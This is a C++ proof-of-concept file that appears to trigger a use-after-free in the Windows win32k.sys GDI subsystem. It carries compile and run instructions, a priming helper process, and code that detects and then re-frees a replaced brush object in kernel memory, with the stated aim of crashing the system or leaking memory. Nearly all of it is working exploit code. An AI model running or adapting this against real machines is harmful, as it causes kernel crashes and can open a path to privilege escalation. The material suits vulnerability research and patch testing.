/* Compile:
 * cl.exe bug304.cpp user32.lib gdi32.lib
 *
 * prime304.exe has to be in the same directory
 *
 * The UAF and leaking of memory is reliable, triggering BSOD's might take a lot of attempts.
 * starting and closing applications while the PoC is running helps to trigger the vulnerabilites.
 * Running the testcase in a loop while using the VM helps (powershell: "while ( 1 ) { .\bug304.exe }")
 * Enabling Special Pool on win32k.sys triggers a bugcheck reliably when accessing the freed memory
 */

#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
 
#include "systemcalls.h"

#define ATTEMPTS 20

HDC getdc() {
	HRGN hrgn = CreateEllipticRgn(0x10, 0x20, 0x30, 0x40);
	HWND deskwnd = GetDesktopWindow();
	HDC hdc = GetDCEx(deskwnd, hrgn, 0x4);
	return hdc;
}

int prime() {
	STARTUPINFO sinfo;
	PROCESS_INFORMATION pinfo;

	memset(&sinfo, 0, sizeof(sinfo));
	sinfo.cb = sizeof(sinfo);

	BOOL rc = CreateProcessA("prime304.exe", NULL, NULL, NULL, NULL, NULL, NULL, NULL, &sinfo, &pinfo);
	if(!rc) {
		printf("[-] failed to run prime.exe\n");
		return rc;
	}
	WaitForSingleObject( pinfo.hProcess, INFINITE );
	return rc;
}

HDC GetCorruptedHDC() {
	for(int x=0; x<ATTEMPTS; x++) {
		HDC hdc_before = getdc();
		printf("[-] hdc_before: %08x\n", hdc_before);
		HBRUSH hbrush_before = (HBRUSH)NtGdiGetDCObject(hdc_before, 0x100000);
		printf("[-] before hbrush: %08x\n", hbrush_before);
		ReleaseDC(hdc_before);
		if(!prime()) return 0x0;
		HDC hdc_after = getdc();
		if(hdc_after != hdc_before) {
			printf("[-] different hdc's\n");
			ReleaseDC(hdc_after);
			continue;
		}
		HBRUSH hbrush_after = (HBRUSH)NtGdiGetDCObject(hdc_after, 0x100000);
		printf("[-] after hbrush: %08x\n", hbrush_after);
		if(hbrush_after != hbrush_before) {
			printf("[+] success hbrush changed, assuming pointing to free brush object\n");
			return hdc_after;
		}
		ReleaseDC(hdc_after);
	}
	return 0x0;
}

int _tmain(int argc, _TCHAR* argv[])
{
	HBRUSH hbrush_new = CreateSolidBrush(0xbeefbeef);
	HDC hdc = GetCorruptedHDC();
	HBRUSH freed = (HBRUSH)NtGdiGetDCObject(hdc, 0x100000);
	for(int x=0;x<100; x++) {
		HBRUSH current = (HBRUSH)NtGdiGetDCObject(hdc, 0x100000);
		if(freed != current) {
			printf("[+] HBRUSH replaced in memory: %08x\n", current);
			printf("[-] trying to free the new object\n");
			NtGdiSelectBrush(hdc, hbrush_new);
			ReleaseDC(hdc);
			break;
		}
		HDC tmp = CreateDCA("DISPLAY", 0x0, 0x0, 0x0);
		printf("tmp: %08x\n", tmp);
		Sleep(200);
	}
	printf("[-] giving up\n");
	return 0;
}
